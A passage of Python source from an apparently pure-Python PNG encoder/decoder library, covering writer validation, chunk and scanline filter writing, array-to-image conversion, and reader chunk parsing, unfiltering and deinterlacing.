be used by the ``zlib`` module. Values from 1 to 9 specify
compression, with 9 being "more compressed" (usually smaller
and slower, but it doesn't always work out that way). 0 means
no compression. -1 and ``None`` both mean that the default
level of compession will be picked by the ``zlib`` module
(which is generally acceptable).
If `interlace` is true then an interlaced image is created
(using PNG's so far only interace method, *Adam7*). This does
not affect how the pixels should be presented to the encoder,
rather it changes how they are arranged into the PNG file.
On slow connexions interlaced images can be partially decoded
by the browser to give a rough view of the image that is
successively refined as more image data appears.
.. note ::
Enabling the `interlace` option requires the entire image
to be processed in working memory.
`chunk_limit` is used to limit the amount of memory used whilst
compressing the image. In order to avoid using large amounts of
memory, multiple ``IDAT`` chunks may be created.
"""
# At the moment the `planes` argument is ignored;
# its purpose is to act as a dummy so that
# ``Writer(x, y, **info)`` works, where `info` is a dictionary
# returned by Reader.read and friends.
# Ditto for `colormap`.
width, height = check_sizes(size, width, height)
del size
if width <= 0 or height <= 0:
raise ValueError("width and height must be greater than zero")
if not isinteger(width) or not isinteger(height):
raise ValueError("width and height must be integers")
# http://www.w3.org/TR/PNG/#7Integers-and-byte-order
if width > 2**32-1 or height > 2**32-1:
raise ValueError("width and height cannot exceed 2**32-1")
if alpha and transparent is not None:
raise ValueError(
"transparent colour not allowed with alpha channel")
if bytes_per_sample is not None:
warnings.warn('please use bitdepth instead of bytes_per_sample',
DeprecationWarning)
if bytes_per_sample not in (0.125, 0.25, 0.5, 1, 2):
raise ValueError(
"bytes per sample must be .125, .25, .5, 1, or 2")
bitdepth = int(8*bytes_per_sample)
del bytes_per_sample
if not isinteger(bitdepth) or bitdepth < 1 or 16 < bitdepth:
raise ValueError("bitdepth (%r) must be a positive integer <= 16" %
bitdepth)
self.rescale = None
palette = check_palette(palette)
if palette:
if bitdepth not in (1,2,4,8):
raise ValueError("with palette, bitdepth must be 1, 2, 4, or 8")
if transparent is not None:
raise ValueError("transparent and palette not compatible")
if alpha:
raise ValueError("alpha and palette not compatible")
if greyscale:
raise ValueError("greyscale and palette not compatible")
else:
# No palette, check for sBIT chunk generation.
if alpha or not greyscale:
if bitdepth not in (8,16):
targetbitdepth = (8,16)[bitdepth > 8]
self.rescale = (bitdepth, targetbitdepth)
bitdepth = targetbitdepth
del targetbitdepth
else:
assert greyscale
assert not alpha
if bitdepth not in (1,2,4,8,16):
if bitdepth > 8:
targetbitdepth = 16
elif bitdepth == 3:
targetbitdepth = 4
else:
assert bitdepth in (5,6,7)
targetbitdepth = 8
self.rescale = (bitdepth, targetbitdepth)
bitdepth = targetbitdepth
del targetbitdepth
if bitdepth < 8 and (alpha or not greyscale and not palette):
raise ValueError(
"bitdepth < 8 only permitted with greyscale or palette")
if bitdepth > 8 and palette:
raise ValueError(
"bit depth must be 8 or less for images with palette")
transparent = check_color(transparent, greyscale, 'transparent')
background = check_color(background, greyscale, 'background')
# It's important that the true boolean values (greyscale, alpha,
# colormap, interlace) are converted to bool because Iverson's
# convention is relied upon later on.
self.width = width
self.height = height
self.transparent = transparent
self.background = background
self.gamma = gamma
self.greyscale = bool(greyscale)
self.alpha = bool(alpha)
self.colormap = bool(palette)
self.bitdepth = int(bitdepth)
self.compression = compression
self.chunk_limit = chunk_limit
self.interlace = bool(interlace)
self.palette = palette
self.x_pixels_per_unit = x_pixels_per_unit
self.y_pixels_per_unit = y_pixels_per_unit
self.unit_is_meter = bool(unit_is_meter)
self.color_type = 4*self.alpha + 2*(not greyscale) + 1*self.colormap
assert self.color_type in (0,2,3,4,6)
self.color_planes = (3,1)[self.greyscale or self.colormap]
self.planes = self.color_planes + self.alpha
# :todo: fix for bitdepth < 8
self.psize = (self.bitdepth/8) * self.planes
def make_palette(self):
"""Create the byte sequences for a ``PLTE`` and if necessary a
``tRNS`` chunk. Returned as a pair (*p*, *t*). *t* will be
``None`` if no ``tRNS`` chunk is necessary.
"""
p = array('B')
t = array('B')
for x in self.palette:
p.extend(x[0:3])
if len(x) > 3:
t.append(x[3])
p = tostring(p)
t = tostring(t)
if t:
return p,t
return p,None
def write(self, outfile, rows):
"""Write a PNG image to the output file. `rows` should be
an iterable that yields each row in boxed row flat pixel
format. The rows should be the rows of the original image,
so there should be ``self.height`` rows of ``self.width *
self.planes`` values. If `interlace` is specified (when
creating the instance), then an interlaced PNG file will
be written. Supply the rows in the normal image order;
the interlacing is carried out internally.
.. note ::
Interlacing will require the entire image to be in working
memory.
"""
if self.interlace:
fmt = 'BH'[self.bitdepth > 8]
a = array(fmt, itertools.chain(*rows))
return self.write_array(outfile, a)
nrows = self.write_passes(outfile, rows)
if nrows != self.height:
raise ValueError(
"rows supplied (%d) does not match height (%d)" %
(nrows, self.height))
def write_passes(self, outfile, rows, packed=False):
"""
Write a PNG image to the output file.
Most users are expected to find the :meth:`write` or
:meth:`write_array` method more convenient.
The rows should be given to this method in the order that
they appear in the output file. For straightlaced images,
this is the usual top to bottom ordering, but for interlaced
images the rows should have already been interlaced before
passing them to this function.
`rows` should be an iterable that yields each row. When
`packed` is ``False`` the rows should be in boxed row flat pixel
format; when `packed` is ``True`` each row should be a packed
sequence of bytes.
"""
# http://www.w3.org/TR/PNG/#5PNG-file-signature
outfile.write(_signature)
# http://www.w3.org/TR/PNG/#11IHDR
write_chunk(outfile, b'IHDR',
struct.pack("!2I5B", int(self.width), int(self.height),
self.bitdepth, int(self.color_type),
0, 0, int(self.interlace)))
# See :chunk:order
# http://www.w3.org/TR/PNG/#11gAMA
if self.gamma is not None:
write_chunk(outfile, b'gAMA',
struct.pack("!L", int(round(self.gamma*1e5))))
# See :chunk:order
# http://www.w3.org/TR/PNG/#11sBIT
if self.rescale:
write_chunk(outfile, b'sBIT',
struct.pack('%dB' % self.planes,
*[self.rescale[0]]*self.planes))
# :chunk:order: Without a palette (PLTE chunk), ordering is
# relatively relaxed. With one, gAMA chunk must precede PLTE
# chunk which must precede tRNS and bKGD.
# See http://www.w3.org/TR/PNG/#5ChunkOrdering
if self.palette:
p,t = self.make_palette()
write_chunk(outfile, b'PLTE', p)
if t:
# tRNS chunk is optional. Only needed if palette entries
# have alpha.
write_chunk(outfile, b'tRNS', t)
# http://www.w3.org/TR/PNG/#11tRNS
if self.transparent is not None:
if self.greyscale:
write_chunk(outfile, b'tRNS',
struct.pack("!1H", *self.transparent))
else:
write_chunk(outfile, b'tRNS',
struct.pack("!3H", *self.transparent))
# http://www.w3.org/TR/PNG/#11bKGD
if self.background is not None:
if self.greyscale:
write_chunk(outfile, b'bKGD',
struct.pack("!1H", *self.background))
else:
write_chunk(outfile, b'bKGD',
struct.pack("!3H", *self.background))
# http://www.w3.org/TR/PNG/#11pHYs
if self.x_pixels_per_unit is not None and self.y_pixels_per_unit is not None:
tup = (self.x_pixels_per_unit, self.y_pixels_per_unit, int(self.unit_is_meter))
write_chunk(outfile, b'pHYs', struct.pack("!LLB",*tup))
# http://www.w3.org/TR/PNG/#11IDAT
if self.compression is not None:
compressor = zlib.compressobj(self.compression)
else:
compressor = zlib.compressobj()
# Choose an extend function based on the bitdepth. The extend
# function packs/decomposes the pixel values into bytes and
# stuffs them onto the data array.
data = array('B')
if self.bitdepth == 8 or packed:
extend = data.extend
elif self.bitdepth == 16:
# Decompose into bytes
def extend(sl):
fmt = '!%dH' % len(sl)
data.extend(array('B', struct.pack(fmt, *sl)))
else:
# Pack into bytes
assert self.bitdepth < 8
# samples per byte
spb = int(8/self.bitdepth)
def extend(sl):
a = array('B', sl)
# Adding padding bytes so we can group into a whole
# number of spb-tuples.
l = float(len(a))
extra = math.ceil(l / float(spb))*spb - l
a.extend([0]*int(extra))
# Pack into bytes
l = group(a, spb)
l = [reduce(lambda x,y:
(x << self.bitdepth) + y, e) for e in l]
data.extend(l)
if self.rescale:
oldextend = extend
factor = \
float(2**self.rescale[1]-1) / float(2**self.rescale[0]-1)
def extend(sl):
oldextend([int(round(factor*x)) for x in sl])
# Build the first row, testing mostly to see if we need to
# changed the extend function to cope with NumPy integer types
# (they cause our ordinary definition of extend to fail, so we
# wrap it). See
# http://code.google.com/p/pypng/issues/detail?id=44
enumrows = enumerate(rows)
del rows
# First row's filter type.
data.append(0)
# :todo: Certain exceptions in the call to ``.next()`` or the
# following try would indicate no row data supplied.
# Should catch.
i,row = next(enumrows)
try:
# If this fails...
extend(row)
except:
# ... try a version that converts the values to int first.
# Not only does this work for the (slightly broken) NumPy
# types, there are probably lots of other, unknown, "nearly"
# int types it works for.
def wrapmapint(f):
return lambda sl: f([int(x) for x in sl])
extend = wrapmapint(extend)
del wrapmapint
extend(row)
for i,row in enumrows:
# Add "None" filter type. Currently, it's essential that
# this filter type be used for every scanline as we do not
# mark the first row of a reduced pass image; that means we
# could accidentally compute the wrong filtered scanline if
# we used "up", "average", or "paeth" on such a line.
data.append(0)
extend(row)
if len(data) > self.chunk_limit:
compressed = compressor.compress(tostring(data))
if len(compressed):
write_chunk(outfile, b'IDAT', compressed)
# Because of our very witty definition of ``extend``,
# above, we must re-use the same ``data`` object. Hence
# we use ``del`` to empty this one, rather than create a
# fresh one (which would be my natural FP instinct).
del data[:]
if len(data):
compressed = compressor.compress(tostring(data))
else:
compressed = b''
flushed = compressor.flush()
if len(compressed) or len(flushed):
write_chunk(outfile, b'IDAT', compressed + flushed)
# http://www.w3.org/TR/PNG/#11IEND
write_chunk(outfile, b'IEND')
return i+1
def write_array(self, outfile, pixels):
"""
Write an array in flat row flat pixel format as a PNG file on
the output file. See also :meth:`write` method.
"""
if self.interlace:
self.write_passes(outfile, self.array_scanlines_interlace(pixels))
else:
self.write_passes(outfile, self.array_scanlines(pixels))
def write_packed(self, outfile, rows):
"""
Write PNG file to `outfile`. The pixel data comes from `rows`
which should be in boxed row packed format. Each row should be
a sequence of packed bytes.
Technically, this method does work for interlaced images but it
is best avoided. For interlaced images, the rows should be
presented in the order that they appear in the file.
This method should not be used when the source image bit depth
is not one naturally supported by PNG; the bit depth should be
1, 2, 4, 8, or 16.
"""
if self.rescale:
raise Error("write_packed method not suitable for bit depth %d" %
self.rescale[0])
return self.write_passes(outfile, rows, packed=True)
def convert_pnm(self, infile, outfile):
"""
Convert a PNM file containing raw pixel data into a PNG file
with the parameters set in the writer object. Works for
(binary) PGM, PPM, and PAM formats.
"""
if self.interlace:
pixels = array('B')
pixels.fromfile(infile,
(self.bitdepth/8) * self.color_planes *
self.width * self.height)
self.write_passes(outfile, self.array_scanlines_interlace(pixels))
else:
self.write_passes(outfile, self.file_scanlines(infile))
def convert_ppm_and_pgm(self, ppmfile, pgmfile, outfile):
"""
Convert a PPM and PGM file containing raw pixel data into a
PNG outfile with the parameters set in the writer object.
"""
pixels = array('B')
pixels.fromfile(ppmfile,
(self.bitdepth/8) * self.color_planes *
self.width * self.height)
apixels = array('B')
apixels.fromfile(pgmfile,
(self.bitdepth/8) *
self.width * self.height)
pixels = interleave_planes(pixels, apixels,
(self.bitdepth/8) * self.color_planes,
(self.bitdepth/8))
if self.interlace:
self.write_passes(outfile, self.array_scanlines_interlace(pixels))
else:
self.write_passes(outfile, self.array_scanlines(pixels))
def file_scanlines(self, infile):
"""
Generates boxed rows in flat pixel format, from the input file
`infile`. It assumes that the input file is in a "Netpbm-like"
binary format, and is positioned at the beginning of the first
pixel. The number of pixels to read is taken from the image
dimensions (`width`, `height`, `planes`) and the number of bytes
per value is implied by the image `bitdepth`.
"""
# Values per row
vpr = self.width * self.planes
row_bytes = vpr
if self.bitdepth > 8:
assert self.bitdepth == 16
row_bytes *= 2
fmt = '>%dH' % vpr
def line():
return array('H', struct.unpack(fmt, infile.read(row_bytes)))
else:
def line():
scanline = array('B', infile.read(row_bytes))
return scanline
for y in range(self.height):
yield line()
def array_scanlines(self, pixels):
"""
Generates boxed rows (flat pixels) from flat rows (flat pixels)
in an array.
"""
# Values per row
vpr = self.width * self.planes
stop = 0
for y in range(self.height):
start = stop
stop = start + vpr
yield pixels[start:stop]
def array_scanlines_interlace(self, pixels):
"""
Generator for interlaced scanlines from an array. `pixels` is
the full source image in flat row flat pixel format. The
generator yields each scanline of the reduced passes in turn, in
boxed row flat pixel format.
"""
# http://www.w3.org/TR/PNG/#8InterlaceMethods
# Array type.
fmt = 'BH'[self.bitdepth > 8]
# Value per row
vpr = self.width * self.planes
for xstart, ystart, xstep, ystep in _adam7:
if xstart >= self.width:
continue
# Pixels per row (of reduced image)
ppr = int(math.ceil((self.width-xstart)/float(xstep)))
# number of values in reduced image row.
row_len = ppr*self.planes
for y in range(ystart, self.height, ystep):
if xstep == 1:
offset = y * vpr
yield pixels[offset:offset+vpr]
else:
row = array(fmt)
# There's no easier way to set the length of an array
row.extend(pixels[0:row_len])
offset = y * vpr + xstart * self.planes
end_offset = (y+1) * vpr
skip = self.planes * xstep
for i in range(self.planes):
row[i::self.planes] = \
pixels[offset+i:end_offset:skip]
yield row
def write_chunk(outfile, tag, data=b''):
"""
Write a PNG chunk to the output file, including length and
checksum.
"""
# http://www.w3.org/TR/PNG/#5Chunk-layout
outfile.write(struct.pack("!I", len(data)))
outfile.write(tag)
outfile.write(data)
checksum = zlib.crc32(tag)
checksum = zlib.crc32(data, checksum)
checksum &= 2**32-1
outfile.write(struct.pack("!I", checksum))
def write_chunks(out, chunks):
"""Create a PNG file by writing out the chunks."""
out.write(_signature)
for chunk in chunks:
write_chunk(out, *chunk)
def filter_scanline(type, line, fo, prev=None):
"""Apply a scanline filter to a scanline. `type` specifies the
filter type (0 to 4); `line` specifies the current (unfiltered)
scanline as a sequence of bytes; `prev` specifies the previous
(unfiltered) scanline as a sequence of bytes. `fo` specifies the
filter offset; normally this is size of a pixel in bytes (the number
of bytes per sample times the number of channels), but when this is
< 1 (for bit depths < 8) then the filter offset is 1.
"""
assert 0 <= type < 5
# The output array. Which, pathetically, we extend one-byte at a
# time (fortunately this is linear).
out = array('B', [type])
def sub():
ai = -fo
for x in line:
if ai >= 0:
x = (x - line[ai]) & 0xff
out.append(x)
ai += 1
def up():
for i,x in enumerate(line):
x = (x - prev[i]) & 0xff
out.append(x)
def average():
ai = -fo
for i,x in enumerate(line):
if ai >= 0:
x = (x - ((line[ai] + prev[i]) >> 1)) & 0xff
else:
x = (x - (prev[i] >> 1)) & 0xff
out.append(x)
ai += 1
def paeth():
# http://www.w3.org/TR/PNG/#9Filter-type-4-Paeth
ai = -fo # also used for ci
for i,x in enumerate(line):
a = 0
b = prev[i]
c = 0
if ai >= 0:
a = line[ai]
c = prev[ai]
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
Pr = a
elif pb <= pc:
Pr = b
else:
Pr = c
x = (x - Pr) & 0xff
out.append(x)
ai += 1
if not prev:
# We're on the first line. Some of the filters can be reduced
# to simpler cases which makes handling the line "off the top"
# of the image simpler. "up" becomes "none"; "paeth" becomes
# "left" (non-trivial, but true). "average" needs to be handled
# specially.
if type == 2: # "up"
type = 0
elif type == 3:
prev = [0]*len(line)
elif type == 4: # "paeth"
type = 1
if type == 0:
out.extend(line)
elif type == 1:
sub()
elif type == 2:
up()
elif type == 3:
average()
else: # type == 4
paeth()
return out
def from_array(a, mode=None, info={}):
"""Create a PNG :class:`Image` object from a 2- or 3-dimensional
array. One application of this function is easy PIL-style saving:
``png.from_array(pixels, 'L').save('foo.png')``.
Unless they are specified using the *info* parameter, the PNG's
height and width are taken from the array size. For a 3 dimensional
array the first axis is the height; the second axis is the width;
and the third axis is the channel number. Thus an RGB image that is
16 pixels high and 8 wide will use an array that is 16x8x3. For 2
dimensional arrays the first axis is the height, but the second axis
is ``width*channels``, so an RGB image that is 16 pixels high and 8
wide will use a 2-dimensional array that is 16x24 (each row will be
8*3 = 24 sample values).
*mode* is a string that specifies the image colour format in a
PIL-style mode. It can be:
``'L'``
greyscale (1 channel)
``'LA'``
greyscale with alpha (2 channel)
``'RGB'``
colour image (3 channel)
``'RGBA'``
colour image with alpha (4 channel)
The mode string can also specify the bit depth (overriding how this
function normally derives the bit depth, see below). Appending
``';16'`` to the mode will cause the PNG to be 16 bits per channel;
any decimal from 1 to 16 can be used to specify the bit depth.
When a 2-dimensional array is used *mode* determines how many
channels the image has, and so allows the width to be derived from
the second array dimension.
The array is expected to be a ``numpy`` array, but it can be any
suitable Python sequence. For example, a list of lists can be used:
``png.from_array([[0, 255, 0], [255, 0, 255]], 'L')``. The exact
rules are: ``len(a)`` gives the first dimension, height;
``len(a[0])`` gives the second dimension; ``len(a[0][0])`` gives the
third dimension, unless an exception is raised in which case a
2-dimensional array is assumed. It's slightly more complicated than
that because an iterator of rows can be used, and it all still
works. Using an iterator allows data to be streamed efficiently.
The bit depth of the PNG is normally taken from the array element's
datatype (but if *mode* specifies a bitdepth then that is used
instead). The array element's datatype is determined in a way which
is supposed to work both for ``numpy`` arrays and for Python
``array.array`` objects. A 1 byte datatype will give a bit depth of
8, a 2 byte datatype will give a bit depth of 16. If the datatype
does not have an implicit size, for example it is a plain Python
list of lists, as above, then a default of 8 is used.
The *info* parameter is a dictionary that can be used to specify
metadata (in the same style as the arguments to the
:class:`png.Writer` class). For this function the keys that are
useful are:
height
overrides the height derived from the array dimensions and allows
*a* to be an iterable.
width
overrides the width derived from the array dimensions.
bitdepth
overrides the bit depth derived from the element datatype (but
must match *mode* if that also specifies a bit depth).
Generally anything specified in the
*info* dictionary will override any implicit choices that this
function would otherwise make, but must match any explicit ones.
For example, if the *info* dictionary has a ``greyscale`` key then
this must be true when mode is ``'L'`` or ``'LA'`` and false when
mode is ``'RGB'`` or ``'RGBA'``.
"""
# We abuse the *info* parameter by modifying it. Take a copy here.
# (Also typechecks *info* to some extent).
info = dict(info)
# Syntax check mode string.
bitdepth = None
try:
# Assign the 'L' or 'RGBA' part to `gotmode`.
if mode.startswith('L'):
gotmode = 'L'
mode = mode[1:]
elif mode.startswith('RGB'):
gotmode = 'RGB'
mode = mode[3:]
else:
raise Error()
if mode.startswith('A'):
gotmode += 'A'
mode = mode[1:]
# Skip any optional ';'
while mode.startswith(';'):
mode = mode[1:]
# Parse optional bitdepth
if mode:
try:
bitdepth = int(mode)
except (TypeError, ValueError):
raise Error()
except Error:
raise Error("mode string should be 'RGB' or 'L;16' or similar.")
mode = gotmode
# Get bitdepth from *mode* if possible.
if bitdepth:
if info.get('bitdepth') and bitdepth != info['bitdepth']:
raise Error("mode bitdepth (%d) should match info bitdepth (%d)." %
(bitdepth, info['bitdepth']))
info['bitdepth'] = bitdepth
# Fill in and/or check entries in *info*.
# Dimensions.
if 'size' in info:
# Check width, height, size all match where used.
for dimension,axis in [('width', 0), ('height', 1)]:
if dimension in info:
if info[dimension] != info['size'][axis]:
raise Error(
"info[%r] should match info['size'][%r]." %
(dimension, axis))
info['width'],info['height'] = info['size']
if 'height' not in info:
try:
l = len(a)
except TypeError:
raise Error(
"len(a) does not work, supply info['height'] instead.")
info['height'] = l
# Colour format.
if 'greyscale' in info:
if bool(info['greyscale']) != ('L' in mode):
raise Error("info['greyscale'] should match mode.")
info['greyscale'] = 'L' in mode
if 'alpha' in info:
if bool(info['alpha']) != ('A' in mode):
raise Error("info['alpha'] should match mode.")
info['alpha'] = 'A' in mode
planes = len(mode)
if 'planes' in info:
if info['planes'] != planes:
raise Error("info['planes'] should match mode.")
# In order to work out whether we the array is 2D or 3D we need its
# first row, which requires that we take a copy of its iterator.
# We may also need the first row to derive width and bitdepth.
a,t = itertools.tee(a)
row = next(t)
del t
try:
row[0][0]
threed = True
testelement = row[0]
except (IndexError, TypeError):
threed = False
testelement = row
if 'width' not in info:
if threed:
width = len(row)
else:
width = len(row) // planes
info['width'] = width
if threed:
# Flatten the threed rows
a = (itertools.chain.from_iterable(x) for x in a)
if 'bitdepth' not in info:
try:
dtype = testelement.dtype
# goto the "else:" clause. Sorry.
except AttributeError:
try:
# Try a Python array.array.
bitdepth = 8 * testelement.itemsize
except AttributeError:
# We can't determine it from the array element's
# datatype, use a default of 8.
bitdepth = 8
else:
# If we got here without exception, we now assume that
# the array is a numpy array.
if dtype.kind == 'b':
bitdepth = 1
else:
bitdepth = 8 * dtype.itemsize
info['bitdepth'] = bitdepth
for thing in 'width height bitdepth greyscale alpha'.split():
assert thing in info
return Image(a, info)
# So that refugee's from PIL feel more at home. Not documented.
fromarray = from_array
class Image:
"""A PNG image. You can create an :class:`Image` object from
an array of pixels by calling :meth:`png.from_array`. It can be
saved to disk with the :meth:`save` method.
"""
def __init__(self, rows, info):
"""
.. note ::
The constructor is not public. Please do not call it.
"""
self.rows = rows
self.info = info
def save(self, file):
"""Save the image to *file*. If *file* looks like an open file
descriptor then it is used, otherwise it is treated as a
filename and a fresh file is opened.
In general, you can only call this method once; after it has
been called the first time and the PNG image has been saved, the
source data will have been streamed, and cannot be streamed
again.
"""
w = Writer(**self.info)
try:
file.write
def close(): pass
except AttributeError:
file = open(file, 'wb')
def close(): file.close()
try:
w.write(file, self.rows)
finally:
close()
class _readable:
"""
A simple file-like interface for strings and arrays.
"""
def __init__(self, buf):
self.buf = buf
self.offset = 0
def read(self, n):
r = self.buf[self.offset:self.offset+n]
if isarray(r):
r = r.tostring()
self.offset += n
return r
try:
str(b'dummy', 'ascii')
except TypeError:
as_str = str
else:
def as_str(x):
return str(x, 'ascii')
class Reader:
"""
PNG decoder in pure Python.
"""
def __init__(self, _guess=None, **kw):
"""
Create a PNG decoder object.
The constructor expects exactly one keyword argument. If you
supply a positional argument instead, it will guess the input
type. You can choose among the following keyword arguments:
filename
Name of input file (a PNG file).
file
A file-like object (object with a read() method).
bytes
``array`` or ``string`` with PNG data.
"""
if ((_guess is not None and len(kw) != 0) or
(_guess is None and len(kw) != 1)):
raise TypeError("Reader() takes exactly 1 argument")
# Will be the first 8 bytes, later on. See validate_signature.
self.signature = None
self.transparent = None
# A pair of (len,type) if a chunk has been read but its data and
# checksum have not (in other words the file position is just
# past the 4 bytes that specify the chunk type). See preamble
# method for how this is used.
self.atchunk = None
if _guess is not None:
if isarray(_guess):
kw["bytes"] = _guess
elif isinstance(_guess, str):
kw["filename"] = _guess
elif hasattr(_guess, 'read'):
kw["file"] = _guess
if "filename" in kw:
self.file = open(kw["filename"], "rb")
elif "file" in kw:
self.file = kw["file"]
elif "bytes" in kw:
self.file = _readable(kw["bytes"])
else:
raise TypeError("expecting filename, file or bytes array")
def chunk(self, seek=None, lenient=False):
"""
Read the next PNG chunk from the input file; returns a
(*type*, *data*) tuple. *type* is the chunk's type as a
byte string (all PNG chunk types are 4 bytes long).
*data* is the chunk's data content, as a byte string.
If the optional `seek` argument is
specified then it will keep reading chunks until it either runs
out of file or finds the type specified by the argument. Note
that in general the order of chunks in PNGs is unspecified, so
using `seek` can cause you to miss chunks.
If the optional `lenient` argument evaluates to `True`,
checksum failures will raise warnings rather than exceptions.
"""
self.validate_signature()
while True:
# http://www.w3.org/TR/PNG/#5Chunk-layout
if not self.atchunk:
self.atchunk = self.chunklentype()
length, type = self.atchunk
self.atchunk = None
data = self.file.read(length)
if len(data) != length:
raise ChunkError('Chunk %s too short for required %i octets.'
% (type, length))
checksum = self.file.read(4)
if len(checksum) != 4:
raise ChunkError('Chunk %s too short for checksum.' % type)
if seek and type != seek:
continue
verify = zlib.crc32(type)
verify = zlib.crc32(data, verify)
# Whether the output from zlib.crc32 is signed or not varies
# according to hideous implementation details, see
# http://bugs.python.org/issue1202 .
# We coerce it to be positive here (in a way which works on
# Python 2.3 and older).
verify &= 2**32 - 1
verify = struct.pack('!I', verify)
if checksum != verify:
(a, ) = struct.unpack('!I', checksum)
(b, ) = struct.unpack('!I', verify)
message = "Checksum error in %s chunk: 0x%08X != 0x%08X." % (type, a, b)
if lenient:
warnings.warn(message, RuntimeWarning)
else:
raise ChunkError(message)
return type, data
def chunks(self):
"""Return an iterator that will yield each chunk as a
(*chunktype*, *content*) pair.
"""
while True:
t,v = self.chunk()
yield t,v
if t == b'IEND':
break
def undo_filter(self, filter_type, scanline, previous):
"""Undo the filter for a scanline. `scanline` is a sequence of
bytes that does not include the initial filter type byte.
`previous` is decoded previous scanline (for straightlaced
images this is the previous pixel row, but for interlaced
images, it is the previous scanline in the reduced image, which
in general is not the previous pixel row in the final image).
When there is no previous scanline (the first row of a
straightlaced image, or the first row in one of the passes in an
interlaced image), then this argument should be ``None``.
The scanline will have the effects of filtering removed, and the
result will be returned as a fresh sequence of bytes.
"""
# :todo: Would it be better to update scanline in place?
# Yes, with the Cython extension making the undo_filter fast,
# updating scanline inplace makes the code 3 times faster
# (reading 50 images of 800x800 went from 40s to 16s)
result = scanline
if filter_type == 0:
return result
if filter_type not in (1,2,3,4):
raise FormatError('Invalid PNG Filter Type.'
' See http://www.w3.org/TR/2003/REC-PNG-20031110/#9Filters .')
# Filter unit. The stride from one pixel to the corresponding
# byte from the previous pixel. Normally this is the pixel
# size in bytes, but when this is smaller than 1, the previous
# byte is used instead.
fu = max(1, self.psize)
# For the first line of a pass, synthesize a dummy previous
# line. An alternative approach would be to observe that on the
# first line 'up' is the same as 'null', 'paeth' is the same
# as 'sub', with only 'average' requiring any special case.
if not previous:
previous = array('B', [0]*len(scanline))
def sub():
"""Undo sub filter."""
ai = 0
# Loop starts at index fu. Observe that the initial part
# of the result is already filled in correctly with
# scanline.
for i in range(fu, len(result)):
x = scanline[i]
a = result[ai]
result[i] = (x + a) & 0xff
ai += 1
def up():
"""Undo up filter."""
for i in range(len(result)):
x = scanline[i]
b = previous[i]
result[i] = (x + b) & 0xff
def average():
"""Undo average filter."""
ai = -fu
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = 0
else:
a = result[ai]
b = previous[i]
result[i] = (x + ((a + b) >> 1)) & 0xff
ai += 1
def paeth():
"""Undo Paeth filter."""
# Also used for ci.
ai = -fu
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = c = 0
else:
a = result[ai]
c = previous[ai]
b = previous[i]
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
pr = a
elif pb <= pc:
pr = b
else:
pr = c
result[i] = (x + pr) & 0xff
ai += 1
# Call appropriate filter algorithm. Note that 0 has already
# been dealt with.
(None,
pngfilters.undo_filter_sub,
pngfilters.undo_filter_up,
pngfilters.undo_filter_average,
pngfilters.undo_filter_paeth)[filter_type](fu, scanline, previous, result)
return result
def deinterlace(self, raw):
"""
Read raw pixel data, undo filters, deinterlace, and flatten.
Return in flat row flat pixel format.
"""
# Values per row (of the target image)
vpr = self.width * self.planes
# Make a result array, and make it big enough. Interleaving
# writes to the output array randomly (well, not quite), so the
# entire output array must be in memory.
fmt = 'BH'[self.bitdepth > 8]
a = array(fmt, [0]*vpr*self.height)
source_offset = 0
for xstart, ystart, xstep, ystep in _adam7:
if xstart >= self.width:
continue
# The previous (reconstructed) scanline. None at the
# beginning of a pass to indicate that there is no previous
# line.
recon = None
# Pixels per row (reduced pass image)
ppr = int(math.ceil((self.width-xstart)/float(xstep)))
# Row size in bytes for this pass.
row_size = int(math.ceil(self.psize * ppr))
for y in range(ystart, self.height, ystep):
filter_type = raw[source_offset]
source_offset += 1
scanline = raw[source_offset:source_offset+row_size]
source_offset += row_size
recon = self.undo_filter(filter_type, scanline, recon)
# Convert so that there is one element per pixel value
flat = self.serialtoflat(recon, ppr)
if xstep == 1:
assert xstart == 0
offset = y * vpr
a[offset:offset+vpr] = flat
else:
offset = y * vpr + xstart * self.planes
end_offset = (y+1) * vpr
skip = self.planes * xstep
for i in range(self.planes):
a[offset+i:end_offset:skip] = \
flat[i::self.planes]
return a
def iterboxed(self, rows):
"""Iterator that yields each scanline in boxed row flat pixel
format. `rows` should be an iterator that yields the bytes of
each row in turn.
"""
def asvalues(raw):
"""Convert a row of raw bytes into a flat row. Result will
be a freshly allocated object, not shared with
argument.
"""
if self.bitdepth == 8:
return array('B', raw)
if self.bitdepth == 16:
raw = tostring(raw)
return array('H', struct.unpack('!%dH' % (len(raw)//2), raw))
assert self.bitdepth < 8
width = self.width
# Samples per byte
spb = 8//self.bitdepth
out = array('B')
mask = 2**self.bitdepth - 1
shifts = [self.bitdepth * i
for i in reversed(list(range(spb)))]
for o in raw:
out.extend([mask&(o>>i) for i in shifts])
return out[:width]
return map(asvalues, rows)
def serialtoflat(self, bytes, width=None):
"""Convert serial format (byte stream) pixel data to flat row
flat pixel.
"""
if self.bitdepth == 8:
return bytes
if self.bitdepth == 16:
bytes = tostring(bytes)
return array('H',
struct.unpack('!%dH' % (len(bytes)//2), bytes))
assert self.bitdepth < 8
if width is None:
width = self.width
# Samples per byte
spb = 8//self.bitdepth
out = array('B')
mask = 2**self.bitdepth - 1
shifts = list(map(self.bitdepth.__mul__, reversed(list(range(spb)))))
l = width
for o in bytes:
out.extend([(mask&(o>>s)) for s in shifts][:l])
l -= spb
if l <= 0:
l = width
return out
def iterstraight(self, raw):
"""Iterator that undoes the effect of filtering, and yields
each row in serialised format (as a sequence of bytes).
Assumes input is straightlaced. `raw` should be an iterable
that yields the raw bytes in chunks of arbitrary size.
"""
# length of row, in bytes
rb = self.row_bytes
a = array('B')
# The previous (reconstructed) scanline. None indicates first
# line of image.
recon = None
for some in raw:
a.extend(some)
while len(a) >= rb + 1:
filter_type = a[0]
scanline = a[1:rb+1]
del a[:rb+1]
recon = self.undo_filter(filter_type, scanline, recon)
yield recon
if len(a) != 0:
# :file:format We get here with a file format error:
# when the available bytes (after decompressing) do not
# pack into exact rows.
raise FormatError(
'Wrong size for decompressed IDAT chunk.')
assert len(a) == 0
def validate_signature(self):
"""If signature (header) has not been read then read and
validate it; otherwise do nothing.
"""
if self.signature:
return
self.signature = self.file.read(8)
if self.signature != _signature:
raise FormatError("PNG file has invalid signature.")
def preamble(self, lenient=False):
"""
Extract the image metadata by reading the initial part of
the PNG file up to the start of the ``IDAT`` chunk. All the
